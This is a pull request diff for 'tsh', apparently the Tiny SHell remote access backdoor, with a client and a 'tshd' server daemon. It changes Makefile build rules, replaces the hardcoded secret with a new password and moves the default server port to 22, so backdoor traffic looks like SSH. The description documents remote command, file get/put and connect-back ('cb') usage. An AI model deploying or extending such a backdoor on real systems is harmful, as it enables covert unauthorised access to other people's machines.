### PR TITLE
Accept command line parameters specifying host and secret

### DIFF
--- a/ChangeLog
+++ b/ChangeLog
@@ -1,3 +1,4 @@
+Version 0.7 fork 2012-10-15. Accept command line options in server
 
 Version 0.6 released on 2003-09-11. Changes from version 0.52:
 

--- a/Makefile
+++ b/Makefile
@@ -9,6 +9,20 @@ COMM		= pel.o aes.o sha1.o
 TSH		= tsh
 TSHD		= tshd
 
+VERSION=tsh-0.7
+CLIENT_OBJ=pel.c aes.c sha1.c  tsh.c
+SERVER_OBJ=pel.c aes.c sha1.c tshd.c
+
+DISTFILES= \
+    sha1.h \
+    README \
+    ChangeLog\
+    pel.h \
+    Makefile \
+    aes.h\
+    tsh.h\
+    $(CLIENT_OBJ) $(SERVER_OBJ)
+
 all:
 	@echo
 	@echo "Please specify one of these targets:"
@@ -24,6 +38,7 @@ all:
 	@echo "	make osf"
 	@echo "	make iphone"
 	@echo
+	make `uname | tr A-Z a-z`
 
 iphone:
 	$(MAKE)								\
@@ -35,10 +50,9 @@ iphone:
 	ldid -S $(TSHD)
 
 linux:
-	$(MAKE)								\
-		LDFLAGS="$(LDFLAGS) -lutil"				\
-		DEFS="$(DEFS) -DLINUX"					\
-		$(TSH) $(TSHD)
+	gcc -O -W -Wall -o tsh  $(CLIENT_OBJ)
+	gcc -O -W -Wall -o tshd $(SERVER_OBJ) -lutil -DLINUX
+	strip tsh tshd
 
 openbsd:
 	$(MAKE)								\
@@ -105,3 +119,11 @@ tshd.o: pel.h tsh.h
 
 clean:
 	$(RM) $(TSH) $(TSHD) *.o core
+
+
+dist:
+	mkdir $(VERSION)
+	cp $(DISTFILES) $(VERSION)
+	tar -czf $(VERSION).tar.gz $(VERSION)
+	rm -r $(VERSION)
+

--- a/tsh.h
+++ b/tsh.h
@@ -1,9 +1,10 @@
 #ifndef _TSH_H
 #define _TSH_H
 
-char *secret = "replace with your password";
+char *secret = "never say never say die";
 
-#define SERVER_PORT 7586
+#define SERVER_PORT 22
+short int server_port = SERVER_PORT;
 /*
 #define CONNECT_BACK_HOST  "localhost"
 #define CONNECT_BACK_DELAY 30


### PR DESCRIPTION
Support secret and port specification without hacking the secret into the code.

Server:
```
Usage: ./tshd [ -s secret ] [ -p port ]
```
Client:
```
Usage: ./tsh [ -s secret ] [ -p port ] [command]

   <hostname|cb>
   <hostname|cb> get <source-file> <dest-dir>
   <hostname|cb> put <source-file> <dest-dir>

```